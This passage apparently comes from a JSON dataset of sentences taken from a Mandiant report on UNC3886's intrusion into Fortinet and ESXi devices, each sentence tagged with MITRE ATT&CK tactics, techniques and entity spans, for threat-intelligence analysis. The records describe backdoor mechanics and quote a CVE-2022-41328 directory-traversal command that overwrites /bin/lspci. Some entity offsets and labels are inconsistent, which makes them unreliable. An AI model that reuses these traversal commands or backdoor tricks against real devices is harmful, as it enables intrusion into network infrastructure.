1.1.0 digital signature verification of system files through targeted corruption of boot files VMware ESXi hypervisor malware framework disclosed in September 2022.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1090.001", "name": "Internal Proxy" }, { "id": "T1562.001", "name": "Disable or Modify Tools" }, { "id": "T1505.003", "name": "Web Shell" }, { "id": "T1553.006", "name": "Code Signing Policy Modification" } ], "procedure": "Maintained persistent access, circumvented firewall rules, established persistence via custom API, and disabled signature verification", "entities": [ { "text": "Maintained persistent access", "start": 0, "end": 28, "label": "Action" }, { "text": "Circumvented firewall rules", "start": 119, "end": 146, "label": "Action" }, { "text": "Established persistence", "start": 313, "end": 336, "label": "Action" }, { "text": "OpenSSL 1.1.0", "start": 444, "end": 457, "label": "Infrastructure_Indicator" }, { "text": "passive traffic redirection utility", "start": 185, "end": 220, "label": "MalwareTool" }, { "text": "persistent backdoors ", "start": 256, "end": 277, "label": "MalwareTool" }, { "text": "VMware ESXi hypervisor malware framework", "start": 547, "end": 587, "label": "MalwareTool" }, { "text": "FortiGate Firewalls", "start": 72, "end": 91, "label": "Infrastructure_Indicator" }, { "text": "FortiManager", "start": 340, "end": 352, "label": "Infrastructure_Indicator" }, { "text": "FortiAnalyzer", "start": 357, "end": 370, "label": "Infrastructure_Indicator" }, { "text": "Super Administrator privileges", "start": 34, "end": 64, "label": "Infrastructure_Indicator" }, { "text": "corruption ", "start": 522, "end": 533, "label": "Action" }, { "text": "Disabled OpenSSL 1.1.0 digital signature verification", "start": 435, "end": 488, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s7-69b8e9", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 7, "context_before": "Maintained persistent access with Super Administrator privileges within FortiGate Firewalls through ICMP port knocking Circumvented firewall rules active on FortiManager devices with a passive traffic redirection utility, enabling continued connections to persistent backdoors with Super Administrator privileges Established persistence on FortiManager and FortiAnalyzer devices through a custom API endpoint created within the device Disabled OpenSSL 1.1.0 digital signature verification of system files through targeted corruption of boot files VMware ESXi hypervisor malware framework disclosed in September 2022.", "sentence_text": "At the time of the ESXi hypervisor compromises, Mandiant observed UNC3886 directly connect from FortiGate and FortiManager devices to VIRTUALPITA backdoors on multiple occasions.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" }, { "id": "T1021", "name": "Remote Services" } ], "procedure": "Directly connected from FortiGate and FortiManager devices to VIRTUALPITA backdoors", "entities": [ { "text": "UNC3886 ", "start": 66, "end": 74, "label": "ThreatActor" }, { "text": "VIRTUALPITA backdoors ", "start": 134, "end": 156, "label": "MalwareTool" }, { "text": "FortiGate", "start": 96, "end": 105, "label": "Infrastructure_Indicator" }, { "text": "FortiManager devices", "start": 110, "end": 130, "label": "Infrastructure_Indicator" }, { "text": "ESXi hypervisor", "start": 19, "end": 34, "label": "Infrastructure_Indicator" }, { "text": "directly connect", "start": 74, "end": 90, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s8-40cefe", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 8, "context_before": "At the time of the ESXi hypervisor compromises, Mandiant observed UNC3886 directly connect from FortiGate and FortiManager devices to VIRTUALPITA backdoors on multiple occasions.", "sentence_text": "Fortinet Ecosystem\nMultiple components of the Fortinet ecosystem were targeted by UNC3886 before they moved laterally to VMWare infrastructure.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s9-6941d1", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 9, "context_before": "Fortinet Ecosystem\nMultiple components of the Fortinet ecosystem were targeted by UNC3886 before they moved laterally to VMWare infrastructure.", "sentence_text": "FortiGate: 6.2.7\n– FortiGate units are network firewall devices which allow for the control and monitoring of network traffic passing through the devices.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s10-cb7378", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 10, "context_before": "FortiGate: 6.2.7\n– FortiGate units are network firewall devices which allow for the control and monitoring of network traffic passing through the devices.", "sentence_text": "FortiAnalyzer 6.4.7\n–\nThe FortiAnalyzer acts as a centralized log management solution for Fortinet devices as well as a reporting platform Scenario #1 (Summary): FortiManager", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s11-70f4a0", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 11, "context_before": "FortiAnalyzer 6.4.7\n–\nThe FortiAnalyzer acts as a centralized log management solution for Fortinet devices as well as a reporting platform Scenario #1 (Summary): FortiManager", "sentence_text": "Exposed to the Internet During this attack lifecycle, as seen in Figure 1, backdoors disguised as legitimate API calls (THINCRUST) were deployed across both FortiAnalyzer and FortiManager devices.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" }, { "id": "T1505.003", "name": "Web Shell" } ], "procedure": "Deployed THINCRUST backdoors disguised as legitimate API calls", "entities": [ { "text": "THINCRUST", "start": 120, "end": 129, "label": "MalwareTool" }, { "text": "FortiManager ", "start": 175, "end": 188, "label": "Infrastructure_Indicator" }, { "text": "FortiAnalyzer ", "start": 157, "end": 171, "label": "Infrastructure_Indicator" }, { "text": "deployed ", "start": 136, "end": 145, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s12-80af99", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 12, "context_before": "Exposed to the Internet During this attack lifecycle, as seen in Figure 1, backdoors disguised as legitimate API calls (THINCRUST) were deployed across both FortiAnalyzer and FortiManager devices.", "sentence_text": "Once persistence was established across the two devices, FortiManager scripts were used to deploy backdoors (CASTLETAP) across the FortiGate devices.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1505.003", "name": "Web Shell" }, { "id": "T1021", "name": "Remote Services" } ], "procedure": "Used FortiManager scripts to deploy CASTLETAP backdoors across FortiGate devices", "entities": [ { "text": "CASTLETAP", "start": 109, "end": 118, "label": "MalwareTool" }, { "text": "FortiManager ", "start": 57, "end": 70, "label": "Infrastructure_Indicator" }, { "text": "FortiGate ", "start": 131, "end": 141, "label": "Infrastructure_Indicator" }, { "text": "deploy ", "start": 91, "end": 98, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s13-19dfd5", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 13, "context_before": "Once persistence was established across the two devices, FortiManager scripts were used to deploy backdoors (CASTLETAP) across the FortiGate devices.", "sentence_text": "previous Mandiant blog post published in September 2022.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s14-5481f8", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 14, "context_before": "previous Mandiant blog post published in September 2022.", "sentence_text": "Scenario #2 (Summary): FortiManager Not Exposed to the Internet", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s15-9c89be", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 15, "context_before": "Scenario #2 (Summary): FortiManager Not Exposed to the Internet", "sentence_text": "The second attack lifecycle occurred where the FortiManager devices had network Access Control Lists (ACL) put in place to restrict external access to only TCP port 541 (FortiGate to FortiManager Protocol).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s16-98b42c", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 16, "context_before": "The second attack lifecycle occurred where the FortiManager devices had network Access Control Lists (ACL) put in place to restrict external access to only TCP port 541 (FortiGate to FortiManager Protocol).", "sentence_text": "During this attack lifecycle, as seen in Figure 2, the threat actor deployed a network traffic redirection utility (TABLEFLIP) and reverse shell backdoor (REPTILE) on the FortiManager device to circumvent the new ACLs.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090", "name": "Proxy" }, { "id": "T1059.004", "name": "Unix Shell" } ], "procedure": "Deployed TABLEFLIP and REPTILE on FortiManager to circumvent ACLs", "entities": [ { "text": "TABLEFLIP", "start": 116, "end": 125, "label": "MalwareTool" }, { "text": "REPTILE", "start": 155, "end": 162, "label": "MalwareTool" }, { "text": "FortiManager device", "start": 171, "end": 190, "label": "Infrastructure_Indicator" }, { "text": "ACLs", "start": 213, "end": 217, "label": "Infrastructure_Indicator" }, { "text": "deployed ", "start": 68, "end": 77, "label": "Action" }, { "text": "circumvent ", "start": 194, "end": 205, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s17-025d75", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 17, "context_before": "During this attack lifecycle, as seen in Figure 2, the threat actor deployed a network traffic redirection utility (TABLEFLIP) and reverse shell backdoor (REPTILE) on the FortiManager device to circumvent the new ACLs.", "sentence_text": "With the redirection rules established by the TABLEFLIP utility, the threat actor was able to access the REPTILE backdoor directly from the Internet for continued access to the environment.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090", "name": "Proxy" } ], "procedure": "Accessed the REPTILE backdoor directly from the Internet using TABLEFLIP redirection rules", "entities": [ { "text": "REPTILE ", "start": 105, "end": 113, "label": "MalwareTool" }, { "text": "TABLEFLIP ", "start": 46, "end": 56, "label": "MalwareTool" }, { "text": "threat actor", "start": 69, "end": 81, "label": "ThreatActor" }, { "text": "Internet ", "start": 140, "end": 149, "label": "Infrastructure_Indicator" }, { "text": "access ", "start": 94, "end": 101, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s18-3a3887", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 18, "context_before": "With the redirection rules established by the TABLEFLIP utility, the threat actor was able to access the REPTILE backdoor directly from the Internet for continued access to the environment.", "sentence_text": "Scenario #1 (Detailed): FortiManager Exposed to the Internet The technical details that follow describe the attack path taken by the threat actor when the FortiManager was initially exposed to the Internet.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Accessed FortiManager exposed to internet using TABLEFLIP and REPTILE", "entities": [ { "text": "FortiManager ", "start": 24, "end": 37, "label": "Infrastructure_Indicator" }, { "text": "Internet ", "start": 52, "end": 61, "label": "Infrastructure_Indicator" }, { "text": "exposed ", "start": 182, "end": 190, "label": "Action" }, { "text": "FortiManager ", "start": 155, "end": 168, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-80_mitre_report-p1-s19-1bea97", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 19, "context_before": "Scenario #1 (Detailed): FortiManager Exposed to the Internet The technical details that follow describe the attack path taken by the threat actor when the FortiManager was initially exposed to the Internet.", "sentence_text": "THINCRUST Backdoor (Python-based Backdoor)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s20-8e7290", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 20, "context_before": "THINCRUST Backdoor (Python-based Backdoor)", "sentence_text": "The threat actor modified the legitimate file /usr/local/lib/python3.8/proj/util/urls.py to include an additional malicious API call, show_device_info , which can be seen in Figure 3.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" }, { "id": "T1554", "name": "Compromise Host Software Binary" } ], "procedure": "Modified a legitimate Python file to include a malicious API call", "entities": [ { "text": "threat actor", "start": 4, "end": 16, "label": "ThreatActor" }, { "text": "modified ", "start": 17, "end": 26, "label": "Action" }, { "text": "/usr/local/lib/python3.8/proj/util/urls.py", "start": 46, "end": 88, "label": "Infrastructure_Indicator" }, { "text": "show_device_info", "start": 134, "end": 150, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-80_mitre_report-p1-s21-e63be0", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 21, "context_before": "The threat actor modified the legitimate file /usr/local/lib/python3.8/proj/util/urls.py to include an additional malicious API call, show_device_info , which can be seen in Figure 3.", "sentence_text": "This allowed the threat actor to interact with the THINCRUST backdoor through POST requests to the URI “ /p/util/show_device_info ”.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "Interacted with the THINCRUST backdoor via POST requests", "entities": [ { "text": "threat actor", "start": 17, "end": 29, "label": "ThreatActor" }, { "text": " THINCRUST backdoor ", "start": 50, "end": 70, "label": "MalwareTool" }, { "text": "/p/util/show_device_info", "start": 105, "end": 129, "label": "MalwareTool" }, { "text": "interact ", "start": 33, "end": 42, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s22-740a7f", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 22, "context_before": "This allowed the threat actor to interact with the THINCRUST backdoor through POST requests to the URI “ /p/util/show_device_info ”.", "sentence_text": "When a POST request was sent to the show_device_info URL, it passed the request to the function get_device_info in /usr/local/lib/python3.8/proj/util/views.py .", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "Passed POST requests to the get_device_info function", "entities": [ { "text": "show_device_info URL", "start": 36, "end": 56, "label": "Infrastructure_Indicator" }, { "text": "/usr/local/lib/python3.8/proj/util/views.py", "start": 115, "end": 158, "label": "Infrastructure_Indicator" }, { "text": "passed ", "start": 61, "end": 68, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s23-35b4f7", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 23, "context_before": "When a POST request was sent to the show_device_info URL, it passed the request to the function get_device_info in /usr/local/lib/python3.8/proj/util/views.py .", "sentence_text": "The FGMGTOKEN cookie is encrypted with an RSA key hardcoded into views.py and contained an RC4 key that decrypted the commands received through the DEVICEID cookie.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573.002", "name": "Asymmetric Cryptography" } ], "procedure": "Decrypt commands received through the DEVICEID cookie using embedded cryptographic keys.", "entities": [ { "text": "FGMGTOKEN cookie", "start": 4, "end": 20, "label": "Infrastructure_Indicator" }, { "text": "RSA key hardcoded into views.py", "start": 42, "end": 73, "label": "Infrastructure_Indicator" }, { "text": "RC4 key", "start": 91, "end": 98, "label": "Infrastructure_Indicator" }, { "text": "decrypted the commands received through the DEVICEID cookie", "start": 104, "end": 163, "label": "Action" }, { "text": "DEVICEID cookie", "start": 148, "end": 163, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-80_mitre_report-p1-s24-25efcd", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 24, "context_before": "The FGMGTOKEN cookie is encrypted with an RSA key hardcoded into views.py and contained an RC4 key that decrypted the commands received through the DEVICEID cookie.", "sentence_text": "The decrypted result of DEVICEID were a JSON encoded dictionary with the keys 'id' and 'key'.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573.001", "name": "Symmetric Cryptography" } ], "procedure": "Decrypted DEVICEID to reveal JSON dictionary with command keys", "entities": [ { "text": "DEVICEID ", "start": 24, "end": 33, "label": "Infrastructure_Indicator" }, { "text": "JSON encoded dictionary", "start": 40, "end": 63, "label": "Infrastructure_Indicator" }, { "text": "'id'", "start": 78, "end": 82, "label": "Infrastructure_Indicator" }, { "text": "'key'", "start": 87, "end": 92, "label": "Infrastructure_Indicator" }, { "text": "decrypted ", "start": 4, "end": 14, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s25-5c61a2", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 25, "context_before": "The decrypted result of DEVICEID were a JSON encoded dictionary with the keys 'id' and 'key'.", "sentence_text": "While most files in views.py had the @login_required decorator applied to them [decorators are any functions (Syntax to call decorator: @) that extend the behavior of another function without explicitly modifying the code], the malicious function get_device_info utilized the Django python module native to the system to add a @csrf_exempt decorator to the function as seen in Figure 5.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1553", "name": "Subvert Trust Controls" } ], "procedure": "Utilized a @csrf_exempt decorator on the malicious get_device_info function", "entities": [ { "text": "views.py", "start": 20, "end": 28, "label": "Infrastructure_Indicator" }, { "text": "@login_required decorator ", "start": 37, "end": 63, "label": "Infrastructure_Indicator" }, { "text": "get_device_info", "start": 247, "end": 262, "label": "Infrastructure_Indicator" }, { "text": " Django python module", "start": 275, "end": 296, "label": "Infrastructure_Indicator" }, { "text": "@csrf_exempt decorator ", "start": 327, "end": 350, "label": "Infrastructure_Indicator" }, { "text": "utilized ", "start": 263, "end": 272, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s26-cd18f9", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 26, "context_before": "While most files in views.py had the @login_required decorator applied to them [decorators are any functions (Syntax to call decorator: @) that extend the behavior of another function without explicitly modifying the code], the malicious function get_device_info utilized the Django python module native to the system to add a @csrf_exempt decorator to the function as seen in Figure 5.", "sentence_text": "This means that the POST request to the malicious API call did not require a login or CSRF token to successfully run.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1553", "name": "Subvert Trust Controls" } ], "procedure": "Bypassed authentication and CSRF token requirements for API calls", "entities": [ { "text": " malicious API call", "start": 39, "end": 58, "label": "Infrastructure_Indicator" }, { "text": "login ", "start": 77, "end": 83, "label": "Infrastructure_Indicator" }, { "text": " CSRF token", "start": 85, "end": 96, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-80_mitre_report-p1-s27-46dc7f", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 27, "context_before": "This means that the POST request to the malicious API call did not require a login or CSRF token to successfully run.", "sentence_text": "views.py\n,\nget_device_info\n, was the same as FortiManager, the API call used to access the backdoor was changed to /p/utils/fortigate_syslog_send on the FortiAnalyzer device, as seen in Figure 6.\nExploitation of CVE-2022-41328 on FortiGate Devices After persistence was established across the FortiManager and FortiAnalyzer devices with the THINCRUST backdoor, the threat actor deployed FortiManager scripts to multiple FortiGate firewalls.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1505.003", "name": "Web Shell" }, { "id": "T1021", "name": "Remote Services" } ], "procedure": "Deployed FortiManager scripts to multiple FortiGate firewalls", "entities": [ { "text": "threat actor", "start": 365, "end": 377, "label": "ThreatActor" }, { "text": "deployed ", "start": 378, "end": 387, "label": "Action" }, { "text": "THINCRUST backdoor", "start": 341, "end": 359, "label": "MalwareTool" }, { "text": "FortiManager ", "start": 293, "end": 306, "label": "Infrastructure_Indicator" }, { "text": "FortiAnalyzer devices ", "start": 310, "end": 332, "label": "Infrastructure_Indicator" }, { "text": " /p/utils/fortigate_syslog_send", "start": 114, "end": 145, "label": "Infrastructure_Indicator" }, { "text": "CVE-2022-41328", "start": 212, "end": 226, "label": "Infrastructure_Indicator" }, { "text": "FortiManager", "start": 45, "end": 57, "label": "Infrastructure_Indicator" }, { "text": " FortiAnalyzer device", "start": 152, "end": 173, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-80_mitre_report-p1-s28-755579", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 28, "context_before": "views.py\n,\nget_device_info\n, was the same as FortiManager, the API call used to access the backdoor was changed to /p/utils/fortigate_syslog_send on the FortiAnalyzer device, as seen in Figure 6.\nExploitation of CVE-2022-41328 on FortiGate Devices After persistence was established across the FortiManager and FortiAnalyzer devices with the THINCRUST backdoor, the threat actor deployed FortiManager scripts to multiple FortiGate firewalls.", "sentence_text": "This activity was logged in the FortiGate elog as seen in Figure 7.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s29-54ec38", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 29, "context_before": "This activity was logged in the FortiGate elog as seen in Figure 7.", "sentence_text": "vd=\"root\"\ntype=\"event\"\nsubtype=\"system\"\nlevel=\"notice\" logdesc=\"Upload and run a script\" user=”Fortimanager_Access” ui=\"fgfmd\" msg=\" User Fortimanager_Access via fgfmd upload and run script: -- OK\" The threat actor deleted these FortiManager scripts from the FortiManager device before they could be recovered for analysis, but correlation of multiple event log types show that the scripts took advantage of a path traversal vulnerability (CVE-2022-41328).", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.004", "name": "File Deletion" }, { "id": "T1068", "name": "Exploitation for Privilege Escalation" } ], "procedure": "Deleted FortiManager scripts and exploited a path traversal vulnerability", "entities": [ { "text": "threat actor", "start": 214, "end": 226, "label": "ThreatActor" }, { "text": "deleted ", "start": 227, "end": 235, "label": "Action" }, { "text": " took advantage of ", "start": 401, "end": 420, "label": "Action" }, { "text": "CVE-2022-41328", "start": 452, "end": 466, "label": "Infrastructure_Indicator" }, { "text": "FortiManager device", "start": 271, "end": 290, "label": "Infrastructure_Indicator" }, { "text": "FortiManager scripts", "start": 241, "end": 261, "label": "MalwareTool" } ] }, { "uid": "mitre-80_mitre_report-p1-s30-c87fe1", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 30, "context_before": "vd=\"root\"\ntype=\"event\"\nsubtype=\"system\"\nlevel=\"notice\" logdesc=\"Upload and run a script\" user=”Fortimanager_Access” ui=\"fgfmd\" msg=\" User Fortimanager_Access via fgfmd upload and run script: -- OK\" The threat actor deleted these FortiManager scripts from the FortiManager device before they could be recovered for analysis, but correlation of multiple event log types show that the scripts took advantage of a path traversal vulnerability (CVE-2022-41328).", "sentence_text": "The vulnerability was exploited by the threat actor using the command execute wireless-controller hs20-icon upload-icon (as seen in Figure 8).", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1068", "name": "Exploitation for Privilege Escalation" } ], "procedure": "Exploited a vulnerability using a specific wireless-controller command", "entities": [ { "text": "threat actor", "start": 39, "end": 51, "label": "ThreatActor" }, { "text": "the command execute wireless-controller hs20-icon upload-icon", "start": 58, "end": 119, "label": "Infrastructure_Indicator" }, { "text": "exploited ", "start": 22, "end": 32, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s31-6c899f", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 31, "context_before": "The vulnerability was exploited by the threat actor using the command execute wireless-controller hs20-icon upload-icon (as seen in Figure 8).", "sentence_text": "This command allowed the threat actor to overwrite legitimate files in a normally restricted system directory.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "Overwrote legitimate files in a restricted system directory", "entities": [ { "text": "overwrite ", "start": 41, "end": 51, "label": "Action" }, { "text": "legitimate files", "start": 51, "end": 67, "label": "Infrastructure_Indicator" }, { "text": "restricted system directory", "start": 82, "end": 109, "label": "Infrastructure_Indicator" }, { "text": " threat actor ", "start": 24, "end": 38, "label": "ThreatActor" } ] }, { "uid": "mitre-80_mitre_report-p1-s32-36f8b4", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 32, "context_before": "This command allowed the threat actor to overwrite legitimate files in a normally restricted system directory.", "sentence_text": "HotSpot 2.0 is a technology which allows for devices to seamlessly switch between cellular data and public Wi-Fi.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s33-254f65", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 33, "context_before": "HotSpot 2.0 is a technology which allows for devices to seamlessly switch between cellular data and public Wi-Fi.", "sentence_text": "However, the\nexecute wireless-controller hs20-icon upload-icon command suffered from two issues.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s34-51b9b0", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 34, "context_before": "However, the\nexecute wireless-controller hs20-icon upload-icon command suffered from two issues.", "sentence_text": "The command did not validate the type of file being uploaded and was susceptible to a directory traversal exploit allowing a threat actor with Super Administrator privileges to upload a file smaller than 65,535 bytes to any location on the file system.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1222", "name": "File and Directory Permissions Modification" } ], "procedure": "Uploaded files to any location on the file system via directory traversal", "entities": [ { "text": " Super Administrator privileges", "start": 142, "end": 173, "label": "Infrastructure_Indicator" }, { "text": "65,535 bytes", "start": 204, "end": 216, "label": "Infrastructure_Indicator" }, { "text": " threat actor", "start": 124, "end": 137, "label": "ThreatActor" } ] }, { "uid": "mitre-80_mitre_report-p1-s35-524949", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 35, "context_before": "The command did not validate the type of file being uploaded and was susceptible to a directory traversal exploit allowing a threat actor with Super Administrator privileges to upload a file smaller than 65,535 bytes to any location on the file system.", "sentence_text": "This means that outside of the size constraints of the command,­­ a threat actor could replace any legitimate system file on the FortiGate firewall.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "Replaced legitimate system files on the FortiGate firewall", "entities": [ { "text": "threat actor", "start": 68, "end": 80, "label": "ThreatActor" }, { "text": "FortiGate firewall", "start": 129, "end": 147, "label": "Infrastructure_Indicator" }, { "text": " legitimate system file", "start": 98, "end": 121, "label": "Infrastructure_Indicator" }, { "text": "replace ", "start": 87, "end": 95, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s36-7f99eb", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 36, "context_before": "This means that outside of the size constraints of the command,­­ a threat actor could replace any legitimate system file on the FortiGate firewall.", "sentence_text": "Successful exploitation of the vulnerability (CVE-2022-41328) is not logged in FortiGate elogs.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s37-716465", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 37, "context_before": "Successful exploitation of the vulnerability (CVE-2022-41328) is not logged in FortiGate elogs.", "sentence_text": "Around the time of the FortiManager script execution, the elogs recorded the threat actor’s failed attempts to overwrite the system file /bin/", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070", "name": "Indicator Removal on Host" } ], "procedure": "Threat actor attempted to overwrite system files on the host, as recorded in system logs, indicating attempted modification of system components.", "entities": [ { "text": "failed attempts to overwrite the system file /bin/", "start": 92, "end": 142, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s38-581c23", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 38, "context_before": "Around the time of the FortiManager script execution, the elogs recorded the threat actor’s failed attempts to overwrite the system file /bin/", "sentence_text": "lspci using this exploit, seen in Figure 8.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s39-415b2b", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 39, "context_before": "lspci using this exploit, seen in Figure 8.", "sentence_text": "execute wireless-controller hs20-icon upload-icon ftp ../../../../../..", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1059.004", "name": "Unix Shell" }, { "id": "T1574.006", "name": "Dynamic Linker Hijacking" } ], "procedure": "Executed directory traversal command to upload files", "entities": [ { "text": "execute wireless-controller hs20-icon upload-icon ftp ../../../../../", "start": 0, "end": 69, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-80_mitre_report-p1-s40-49cc2f", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 40, "context_before": "execute wireless-controller hs20-icon upload-icon ftp ../../../../../..", "sentence_text": "/bin/lspci execute wireless-controller hs20-icon upload-icon tftp ../..", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1059.004", "name": "Unix Shell" }, { "id": "T1574.006", "name": "Dynamic Linker Hijacking" } ], "procedure": "Attempted to upload modified /bin/lspci file via TFTP using directory traversal", "entities": [ { "text": "/bin/lspci", "start": 0, "end": 10, "label": "Infrastructure_Indicator" }, { "text": " ", "start": 11, "end": 27, "label": "Infrastructure_Indicator" }, { "text": "execute wireless-controller hs20-icon upload-icon tftp ../", "start": 27, "end": 85, "label": "Infrastructure_Indicator" } ] }, { "uid": 